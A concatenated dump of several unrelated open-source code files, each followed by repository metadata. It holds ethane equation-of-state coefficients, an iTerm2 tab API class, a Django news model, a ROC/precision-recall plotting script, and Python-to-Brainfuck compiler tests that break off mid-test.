st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
280 5 13.26 -0.228 160.21 48.73 103.93 603.7 57.96 90.7
>>> st=C2(T=300, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
300 1 0.43 11.364 209.01 45.59 57.20 296.8 9.65 22.2
>>> st=C2(T=330, P=5e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
330 0.5 0.19 13.366 220.86 48.51 57.89 320.8 10.37 25.6
>>> st=C2(T=360, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
360 2 0.73 14.5 213.23 53.11 65.46 319.6 11.65 31.1
>>> st=C2(T=400, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
400 5 1.77 16.051 210.58 59.05 76.57 322.4 13.91 40.0
>>> st=C2(T=430, P=2e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
430 20 7.42 14.158 197.14 64.79 101.22 409.8 27.52 66.5
>>> st=C2(T=480, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
480 0.1 0.03 23.500 259.25 67.28 75.67 385.8 14.28 50.1
>>> st=C2(T=500, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
500 60 11.21 19.385 199.38 73.24 95.28 752.5 48.34 101.4
""",
"R": 8.31451,
"cp": Fi3,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874, "so": 229.12},
"Tt": 90.352, "Tc": 305.33, "Pc": 4871.8, "rhoc": 6.87, "M": 30.07,
"Tmin": 90.352, "Tmax": 625.0, "Pmax": 70000.0, "rhomax": 22.419,
"Pmin": 1.130e-3, "rhomin": 21.665,
"nr1": [0.46215430560, -0.19236936387e1, 0.39878604003, 0.16054532372e-1,
0.12895242219, 0.35458320491e-1, 0.34927844540e-1,
-0.11306183380e-1, -0.39809032779e-1, 0.83031936834e-3,
0.45921575183e-3, 0.17530287917e-6, -0.70919516126e-4],
"d1": [1, 1, 1, 2, 2, 2, 3, 3, 3, 6, 7, 7, 8],
"t1": [0, 1.5, 2.5, -0.5, 1.5, 2, 0, 1, 2.5, 0, 2, 5, 2],
"nr2": [-0.23436162249, 0.84574697645e-1, 0.14861052010, -0.10016857867,
-0.59264824388e-1, -0.41263514217e-1, 0.21855161869e-1,
-0.74552720958e-4, -0.98859085572e-2, 0.10208416499e-2,
-0.52189655847e-3, 0.98592162030e-4, 0.46865140856e-1,
-0.19558011646e-1, -0.46557161651e-1, 0.32877905376e-2,
0.13572090185, -0.10846471455, -0.67502836903e-2],
"d2": [1, 1, 2, 2, 3, 3, 5, 6, 7, 8, 10, 2, 3, 3, 4, 4, 5, 5, 5],
"t2": [5, 6, 3.5, 5.5, 3, 7, 6, 8.5, 4, 6.5, 5.5, 22, 11, 18, 11, 23,
17, 18, 23],
"c2": [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4, 4, 4, 4, 4, 4],
"gamma2": [1]*19}
helmholtz4 = {
"__type__": "Helmholtz",
"__name__": "short Helmholtz equation of state for ethane of Span and Wagner (2003)",
"__doi__": {"autor": "Span, R., Wagner, W.",
"title": "Equations of state for technical applications. II. Results for nonpolar fluids.",
"ref": "Int. J. Thermophys. 24 (2003), 41 – 109.",
"doi": "10.1023/A:1022310214958"},
"__test__": """
>>> st=C2(T=700, rho=200, eq=4)
>>> print "%0.4f %0.3f %0.4f" % (st.cp0.kJkgK, st.P.MPa, st.cp.kJkgK)
3.2991 44.781 3.6276
>>> st2=C2(T=750, rho=100, eq=4)
>>> print "%0.2f %0.5f" % (st2.h.kJkg-st.h.kJkg, st2.s.kJkgK-st.s.kJkgK)
209.07 0.50715
""", # Table III, Pag 46
"R": 8.31451,
"cp": Fi1,
"ref": "OTO",
"Tmin": 90.352, "Tmax": 750.0, "Pmax": 100000.0, "rhomax": 22.419,
"Pmin": 0.0010902, "rhomin": 21.721,
"nr1": [0.97628068, -0.26905251e1, 0.73498222, -0.35366206e-1,
0.84692031e-1, 0.24154594e-3],
"d1": [1, 1, 1, 2, 3, 7],
"t1": [0.25, 1.125, 1.5, 1.375, 0.25, 0.875],
"nr2": [0.23964954, -0.42780093e-1, -0.22308832, -0.51799954e-1,
-0.27178426e-1, 0.11246305e-1],
"d2": [2, 5, 1, 4, 3, 4],
"t2": [0.625, 1.75, 3.625, 3.625, 14.5, 12.],
"c2": [1, 1, 2, 2, 3, 3],
"gamma2": [1]*6}
helmholtz5 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Sun and Ely (2004)",
"__doi__": {"autor": "Sun, L. and Ely, J.F.",
"title": "Universal equation of state for engineering application: Algorithm and application to non-polar and polar fluids",
"ref": "Fluid Phase Equilib., 222-223:107-118, 2004.",
"doi": "10.1016/j.fluid.2004.06.028"},
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [1.32031629, 9.47177394e-1, -3.21919278, 7.47287278e-2,
2.74919584e-4, -6.33952115e-2],
"d1": [1, 1, 1, 3, 7, 2],
"t1": [1.5, 0.25, 1.25, 0.25, 0.875, 1.375],
"nr2": [-5.17685674e-2, 3.65838926e-2, 2.57753669e-1, -1.34856586e-2,
-2.21551776e-1, -6.89219870e-4, -4.47904791e-2, -2.15665728e-2],
"d2": [1, 1, 2, 5, 1, 1, 4, 2],
"t2": [0, 2.375, 2., 2.125, 3.5, 6.5, 4.75, 12.5],
"c2": [1, 1, 1, 1, 2, 2, 2, 3],
"gamma2": [1]*8}
eq = helmholtz1, MBWR, GERG, helmholtz3, helmholtz4, helmholtz5
_surface = {"sigma": [0.07602, -0.02912], "exp": [1.32, 1.676]}
_dielectric = {"eq": 3, "Tref": 273.16, "rhoref": 1000.,
"a0": [], "expt0": [], "expd0": [],
"a1": [11.1552, 0.0112], "expt1": [0, 1], "expd1": [1, 1],
"a2": [36.759, 23.639, -808.03, -378.84],
"expt2": [0, 1, 0, 1], "expd2": [2, 2, 2.75, 2.75]}
_melting = {"eq": 1, "Tref": Tt, "Pref": 0.0011421,
"Tmin": Tt, "Tmax": 2000.0,
"a1": [1, 1.05262374e8, -1.05262374e8], "exp1": [0, 2.55, 0],
"a2": [2.23626315e8], "exp2": [1], "a3": [], "exp3": []}
_vapor_Pressure = {
"eq": 5,
"ao": [-6.48647577, 1.47010078, -1.66261122, 3.57898378, -4.79105705],
"exp": [1, 1.5, 2.5, 3.5, 4]}
_liquid_Density = {
"eq": 4,
"ao": [1.56138026, -0.381552776, 0.078537204, 0.0370315089],
"exp": [0.987, 2, 4, 9.5]}
_vapor_Density = {
"eq": 6,
"ao": [-1.89879145, -3.65459262, 0.850562745, 0.363965487, -1.50005943,
-2.26690389],
"exp": [1.038, 2.5, 3, 6, 9, 15]}
visco0 = {"eq": 1, "omega": 1,
"collision": [0.17067154, -0.48879666, 0.039038856],
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"ek": 245.0, "sigma": 0.43682,
"Tref": 1, "rhoref": 1.*M,
"n_chapman": 0.1463897/M**0.5,
"Tref_res": 305.33, "rhoref_res": 6.87*M, "etaref_res": 15.977,
"n_num": [0.47177003, -0.23950311, 0.39808301, -0.27343335,
0.35192260, -0.21101308, -0.00478579, 0.07378129,
-0.030425255],
"t_num": [0, -1, 0, -1, -1.5, 0, -2, 0, -1],
"d_num": [1, 1, 2, 2, 2, 3, 3, 4, 4],
"g_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"c_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"n_den": [1., -0.30435286, 0.001215675],
"t_den": [0, 0, -1],
"d_den": [0, 1, 1],
"g_den": [0, 0, 0],
"c_den": [0, 0, 0]}
visco1 = {"eq": 2, "omega": 2,
"__name__": "Younglove (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"ek": 240.0, "sigma": 0.440110,
"n_chapman": 0.146388493/M**0.5,
"F": [0.2102436247e1, -0.1065920192e1, 1.4, 305.33],
"E": [-0.1903481042e2, 0.1799260494e4, 0.1561316986e2,
-0.1497221136e5, 0.1130374601, -0.2186440756e2,
0.8235954037e4],
"rhoc": 6.875}
visco2 = {"eq": 4, "omega": 1,
"__name__": u"Quiñones-Cisneros (2006)",
"__doi__": {"autor": "S.E.Quiñones-Cisneros and U.K. Deiters",
"title": "Generalization of the Friction Theory for Viscosity Modeling",
"ref": "J. Phys. Chem. B, 2006, 110 (25), pp 12820–12834",
"doi": "10.1021/jp0618577"},
"Tref": 305.322, "muref": 1.0,
"ek": 240.0, "sigma": 0.440110, "n_chapman": 0,
"n_ideal": [15.9252, -49.7734, 43.4368],
"t_ideal": [0, 0.25, 0.5],
"a": [-7.50685764546476e-6, -1.50327318940575e-6, 5.58090793793288e-15],
"b": [6.72861662009487e-5, -4.36450942982638e-5, -7.97441663817752e-14],
"c": [3.88039503242230e-5, -1.38523739665972e-5, -2.64094611051755e-15],
"A": [7.68043111364307e-10, -1.32047872761278e-10, 0.0],
"B": [9.15406537766279e-9, 4.13028199950288e-10, 0.0],
"C": [-1.45842039761136e-7, 2.39764228120527e-7, 0.0],
"D": [0.0, 0.0, 0.0]}
_viscosity = visco0, visco1, visco2
thermo0 = {"eq": 1,
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"Tref": 245.0, "kref": 1e-3,
"no": [1.7104147, -0.6936482, 0],
"co": [0, -1, -96],
"Trefb": 305.33, "rhorefb": 6.87, "krefb": 4.41786e-3,
"nb": [0.96084322, 2.7500235, -0.026609289, -0.078146729,
0.21881339, 2.3849563, -0.75113971],
"tb": [0, 0, 0, 0, 0, -1.5, -1],
"db": [1, 2, 3, 4, 5, 1, 3],
"cb": [0]*7,
"critical": 3,
"gnu": 0.63, "gamma": 1.242, "R0": 1.01,
"Xio": 0.19e-9, "gam0": 0.0563, "qd": -0.545e-9, "Tcref": 610.66}
_thermal = thermo0,
|
gpl-3.0
| -2,264,954,759,358,182,100
| 55.345395
| 181
| 0.480326
| false
| 2.13034
| false
| false
| false
|
lgouger/iTerm2
|
api/library/python/iterm2/iterm2/tab.py
|
1
|
10947
|
"""Provides a class that represents an iTerm2 tab."""
import enum
import iterm2.api_pb2
import iterm2.app
import iterm2.capabilities
import iterm2.rpc
import iterm2.session
import iterm2
import json
import typing
class NavigationDirection(enum.Enum):
"""Cardinal directions."""
LEFT = "left"
RIGHT = "right"
ABOVE = "above"
BELOW = "below"
class Tab:
"""Represents a tab.
Don't create this yourself. Instead, use :class:`~iterm2.App`."""
def __init__(self, connection, tab_id, root, tmux_window_id=None, tmux_connection_id=None):
self.connection = connection
self.__tab_id = tab_id
self.__root = root
self.active_session_id = None
self.__tmux_window_id = tmux_window_id
self.__tmux_connection_id = tmux_connection_id
def __repr__(self):
return "<Tab id=%s sessions=%s>" % (self.__tab_id, self.sessions)
def update_from(self, other):
"""Copies state from another tab into this one."""
self.__root = other.root
self.active_session_id = other.active_session_id
def update_session(self, session):
"""Replaces references to a session."""
self.__root.update_session(session)
@property
def window(self) -> 'iterm2.Window':
"""Returns the containing window."""
# Note: App sets get_window on Tab when it's created.
return Tab.get_window(self)
@property
def tmux_connection_id(self):
return self.__tmux_connection_id
@property
def tab_id(self) -> str:
"""
Each tab has a globally unique identifier.
:returns: The tab's identifier, a string.
"""
return self.__tab_id
@property
def sessions(self) -> typing.List[iterm2.session.Session]:
"""
A tab contains a list of sessions, which are its split panes.
:returns: The sessions belonging to this tab, in no particular order.
"""
return self.__root.sessions
@property
def root(self) -> iterm2.session.Splitter:
"""
A tab's sessions are stored in a tree. This returns the root of that tree.
An interior node of the tree is a Splitter. That corresponds to a
collection of adjacent sessions with split pane dividers that are all
either vertical or horizontal.
Leaf nodes are Sessions.
:returns: The root of the session tree.
"""
return self.__root
@property
def current_session(self) -> typing.Union[None, iterm2.session.Session]:
"""
:returns: The active session in this tab or `None` if it could not be determined.
"""
for session in self.sessions:
if session.session_id == self.active_session_id:
return session
return None
def pretty_str(self, indent: str="") -> str:
"""
:returns: A human readable description of the tab and its sessions.
"""
session = indent + "Tab id=%s\n" % self.tab_id
session += self.__root.pretty_str(indent=indent + " ")
return session
async def async_select(self, order_window_front: bool=True) -> None:
"""Deprecated in favor of `async_activate`."""
await async_activate(order_window_front)
async def async_activate(self, order_window_front: bool=True) -> None:
"""
Selects this tab.
:param order_window_front: Whether the window this session is in should be brought to the front and given keyboard focus.
.. seealso:: Example ":ref:`function_key_tabs_example`"
"""
await iterm2.rpc.async_activate(
self.connection,
False,
True,
order_window_front,
tab_id=self.__tab_id)
async def async_select_pane_in_direction(self, direction: NavigationDirection) -> typing.Optional[str]:
"""
Activates a split pane adjacent to the currently selected pane.
Requires iTerm2 version 3.3.2.
:param direction: Specifies the direction to move. For example, LEFT will cause the pane to the left of the currently active one.
:returns: The ID of the newly selected session ID, or None if there was no session in that direction.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
if not iterm2.capabilities.supports_select_pane_in_direction(self.connection):
raise iterm2.capabilities.AppVersionTooOld()
invocation = iterm2.util.invocation_string(
"iterm2.select_pane_in_direction",
{ "direction": direction.value })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_update_layout(self) -> None:
"""Adjusts the layout of the sessions in this tab.
Change the `Session.preferred_size` of any sessions you wish to adjust before calling this.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_set_tab_layout(self.connection, self.tab_id, self.__root.to_protobuf())
status = response.set_tab_layout_response.status
if status == iterm2.api_pb2.SetTabLayoutResponse.Status.Value("OK"):
return response.set_tab_layout_response
else:
raise iterm2.rpc.RPCException(iterm2.api_pb2.SetTabLayoutResponse.Status.Name(status))
@property
def tmux_window_id(self) -> typing.Union[None, str]:
"""Returns this tab's tmux window id or None.
:returns: A tmux window id or `None` if this is not a tmux integration window.
"""
return self.__tmux_window_id
async def async_set_variable(self, name: str, value: typing.Any) -> None:
"""
Sets a user-defined variable in the tab.
See the Scripting Fundamentals documentation for more information on user-defined variables.
:param name: The variable's name. Must begin with `user.`.
:param value: The new value to assign.
:throws: :class:`RPCException` if something goes wrong.
"""
result = await iterm2.rpc.async_variable(
self.connection,
sets=[(name, json.dumps(value))],
tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
async def async_get_variable(self, name: str) -> typing.Any:
"""
Fetches a tab variable.
See Badges documentation for more information on variables.
:param name: The variable's name.
:returns: The variable's value or `None` if it is undefined.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`sorttabs_example`"
"""
result = await iterm2.rpc.async_variable(self.connection, gets=[name], tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
else:
return json.loads(result.variable_response.values[0])
async def async_close(self, force: bool=False) -> None:
"""
Closes the tab.
:param force: If True, the user will not be prompted for a confirmation.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`close_to_the_right_example`"
"""
result = await iterm2.rpc.async_close(self.connection, tabs=[self.__tab_id], force=force)
status = result.close_response.statuses[0]
if status != iterm2.api_pb2.CloseResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.CloseResponse.Status.Name(status))
async def async_set_title(self, title: str):
"""Changes the tab's title.
This is equivalent to editing the tab's title with the menu item Edit Tab Title. The title is an interpolated string.
:param title: The new title. Set it to an empty string to use the default value (the current session's title).
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
invocation = iterm2.util.invocation_string(
"iterm2.set_title",
{ "title": title })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_invoke_function(self, invocation: str, timeout: float=-1):
"""
Invoke an RPC. Could be a registered function by this or another script of a built-in function.
This invokes the RPC in the context of this tab. Note that most user-defined RPCs expect to be invoked in the context of a session. Default variables will be pulled from that scope. If you call a function from the wrong context it may fail because its defaults will not be set properly.
:param invocation: A function invocation string.
:param timeout: Max number of secondsto wait. Negative values mean to use the system default timeout.
:returns: The result of the invocation if successful.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_invoke_function(
self.connection,
invocation,
tab_id=self.tab_id,
timeout=timeout)
which = response.invoke_function_response.WhichOneof('disposition')
if which == 'error':
if response.invoke_function_response.error.status == iterm2.api_pb2.InvokeFunctionResponse.Status.Value("TIMEOUT"):
raise iterm2.rpc.RPCException("Timeout")
else:
raise iterm2.rpc.RPCException("{}: {}".format(
iterm2.api_pb2.InvokeFunctionResponse.Status.Name(
response.invoke_function_response.error.status),
response.invoke_function_response.error.error_reason))
return json.loads(response.invoke_function_response.success.json_result)
async def async_move_to_window(self) -> 'iterm2.window.Window':
"""
Moves this tab to its own window, provided there are multiple tabs in the window it belongs to.
:returns: The new window ID.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
window_id = await self.async_invoke_function("iterm2.move_tab_to_window()")
app = await iterm2.app.async_get_app(self.connection)
assert(app)
window = app.get_window_by_id(window_id)
if not window:
raise iterm2.rpc.RPCException("No such window {}".format(window_id))
return window
|
gpl-2.0
| -8,314,729,409,645,964,000
| 38.377698
| 294
| 0.636065
| false
| 4.006955
| false
| false
| false
|
OpenTTD-Ladder/ladder-web
|
ladder/frontpage/models.py
|
1
|
1035
|
from django.conf import settings
from django.db import models
from django.utils import timezone
from translations.models import Translatable, Translation
try:
from ckeditor.fields import RichTextField
except ImportError:
RichTextField = models.TextField
class News(Translatable):
author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name = "news_authored")
authored = models.DateTimeField(default = timezone.now)
background = models.ImageField(upload_to = "images", blank = True, null = True)
class Meta:
verbose_name = "News Item"
verbose_name_plural = "News Items"
class NewsTranslation(Translation):
news = models.ForeignKey(News, related_name='translations')
title = models.CharField(max_length = 64)
intro = RichTextField()
continued = RichTextField()
def __unicode__(self):
return self.title
class Meta:
verbose_name = "Translation"
verbose_name_plural = "Translations"
|
gpl-2.0
| -3,211,320,791,145,666,600
| 32.419355
| 97
| 0.674396
| false
| 4.348739
| false
| false
| false
|
ntamas/yard
|
yard/scripts/plot.py
|
1
|
9037
|
"""Standalone command-line application that plots ROC, precision-recall
and accumulation curves."""
import sys
from itertools import cycle
from yard.data import BinaryClassifierData
from yard.curve import CurveFactory
from yard.scripts import CommandLineAppForClassifierData
from yard.utils import parse_size
__author__ = "Tamas Nepusz"
__email__ = "tamas@cs.rhul.ac.uk"
__copyright__ = "Copyright (c) 2010, Tamas Nepusz"
__license__ = "MIT"
class ROCPlotterApplication(CommandLineAppForClassifierData):
"""\
%prog input_file
Standalone command-line application that plots ROC, precision-recall
and accumulation curves.
The input file must contain one observation per line, the first column
being the expected class (1 for positive examples, -1 for negatives),
the second being the prediction itself. You can also use the -c switch
to use different column indices and multiple datasets. Columns are
separated by whitespace per default.\
"""
short_name = "yard-plot"
def __init__(self):
super(ROCPlotterApplication, self).__init__()
def add_parser_options(self):
"""Creates the command line parser object for the application"""
super(ROCPlotterApplication, self).add_parser_options()
parser = self.parser
parser.add_option(
"-t",
"--curve-type",
dest="curve_types",
metavar="TYPE",
choices=CurveFactory.get_curve_names(),
action="append",
default=[],
help="sets the TYPE of the curve to be plotted "
"(roc, pr, ac, sespe or croc). May be specified "
"multiple times.",
)
parser.add_option(
"-l",
"--log-scale",
dest="log_scale",
metavar="AXES",
help="use logarithmic scale on the given AXES. "
"Valid values: none, x, y and xy",
choices=["none", "x", "y", "xy"],
default="none",
)
parser.add_option(
"-o",
"--output",
dest="output",
metavar="FILE",
help="saves the plot to the given FILE instead of showing it",
default=None,
)
parser.add_option(
"-s",
"--size",
dest="size",
metavar="WIDTHxHEIGHT",
help="sets the size of the figure to WIDTHxHEIGHT, where "
"WIDTH and HEIGHT are measures in inches. You may "
"specify alternative measures (cm or mm) by adding "
'them as a suffix; e.g., "6cmx4cm" or "6cm x 4cm"',
default=None,
)
parser.add_option(
"--dpi",
dest="dpi",
metavar="DPI",
type=float,
default=72.0,
help="specifies the dpi value (dots per inch) when "
"converting pixels to inches and vice versa "
"in figure and font size calculations. "
"Default: %default",
)
parser.add_option(
"--font-size",
dest="font_size",
metavar="SIZE",
type=float,
default=None,
help="overrides the font size to be used on figures, " "in points (pt).",
)
parser.add_option(
"--show-auc",
dest="show_auc",
action="store_true",
default=False,
help="shows the AUC scores in the legend",
)
parser.add_option(
"--no-resampling",
dest="resampling",
action="store_false",
default=True,
help="don't resample curves before " "plotting and AUC calculation",
)
def run_real(self):
"""Runs the main application"""
import matplotlib
# Do we need headless mode for matplotlib?
if self.options.output:
matplotlib.use("agg")
# If no curve type was given, assume a ROC curve
if not self.options.curve_types:
self.options.curve_types = ["roc"]
# Set up the font size
if self.options.font_size is not None:
for param in ["font.size", "legend.fontsize"]:
matplotlib.rcParams[param] = self.options.font_size
# Get the types of the curves to be plotted
curve_classes = []
for name in self.options.curve_types:
try:
curve_classes.append(CurveFactory.find_class_by_name(name))
except ValueError:
self.parser.error("Unknown curve type: %s" % name)
# Do we have multiple curve types? If so, we need PDF output
pp = None
if len(curve_classes) > 1:
if not self.options.output or not self.options.output.endswith(".pdf"):
self.parser.error("multiple curves can only be plotted to PDF")
try:
from matplotlib.backends.backend_pdf import PdfPages
except ImportError:
self.parser.error(
"Matplotlib is too old and does not have "
"multi-page PDF support yet. Please upgrade it to "
"Matplotlib 0.99 or later"
)
pp = PdfPages(self.options.output)
def figure_saver(figure):
pp.savefig(figure, bbox_inches="tight")
elif self.options.output:
# Figure with a single plot will be created
def figure_saver(figure):
self.log.info("Saving plot to %s..." % self.options.output)
figure.savefig(self.options.output, bbox_inches="tight")
else:
# Figure will be shown on screen
def figure_saver(figure):
import matplotlib.pyplot as plt
plt.show()
self.process_input_files()
self.log.info("Plotting results...")
for curve_class in curve_classes:
fig = self.get_figure_for_curves(curve_class)
figure_saver(fig)
# For multi-page output, we have to close it explicitly
if pp is not None:
pp.close()
def get_figure_for_curves(self, curve_class):
"""Plots curves given by `curve_class` for all the data in `self.data`.
`curve_class` is a subclass of `BinaryClassifierPerformanceCurve`.
`self.data` must be a dict of lists, and the ``__class__`` key of
`self.data` must map to the expected classes of elements. Returns an
instance of `matplotlib.figure.Figure`."""
fig, axes = None, None
data = self.data
expected = data["__class__"]
keys = sorted(data.keys())
keys.remove("__class__")
styles = [
"r-",
"b-",
"g-",
"c-",
"m-",
"y-",
"k-",
"r--",
"b--",
"g--",
"c--",
"m--",
"y--",
"k--",
]
# Plot the curves
line_handles, labels, aucs = [], [], []
for key, style in zip(keys, cycle(styles)):
self.log.info(
"Calculating %s for %s..." % (curve_class.get_friendly_name(), key)
)
observed = data[key]
bc_data = BinaryClassifierData(zip(observed, expected), title=key)
curve = curve_class(bc_data)
if self.options.resampling:
curve.resample(x / 2000.0 for x in range(2001))
if self.options.show_auc:
aucs.append(curve.auc())
labels.append("%s, AUC=%.4f" % (key, aucs[-1]))
else:
labels.append(key)
if not fig:
dpi = self.options.dpi
fig = curve.get_empty_figure(
dpi=dpi, figsize=parse_size(self.options.size, dpi=dpi)
)
axes = fig.get_axes()[0]
line_handle = curve.plot_on_axes(axes, style=style, legend=False)
line_handles.append(line_handle)
if aucs:
# Sort the labels of the legend in decreasing order of AUC
indices = sorted(range(len(aucs)), key=aucs.__getitem__, reverse=True)
line_handles = [line_handles[i] for i in indices]
labels = [labels[i] for i in indices]
aucs = [aucs[i] for i in indices]
if axes:
legend_pos = "best"
# Set logarithmic axes if needed
if "x" in self.options.log_scale:
axes.set_xscale("log")
legend_pos = "upper left"
if "y" in self.options.log_scale:
axes.set_yscale("log")
# Plot the legend
axes.legend(line_handles, labels, loc=legend_pos)
return fig
def main():
"""Entry point for the plotter script"""
sys.exit(ROCPlotterApplication().run())
if __name__ == "__main__":
main()
|
mit
| -2,838,634,514,883,085,300
| 31.507194
| 85
| 0.531592
| false
| 4.168358
| false
| false
| false
|
vegitron/python2brainfuck
|
t/py2b/if_statements.py
|
1
|
4029
|
import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestIfStatements(unittest.TestCase):
def test_if_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_false(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if False:\n print "BAD" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "")
def test_other_var_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = 'A'\nif foo:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_plain_string_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if 'A':\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
def test_if_elif_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_elif_else_match_elif(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELIF\n")
def test_if_elif_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif False:\n print 'ELIF 2'\n"
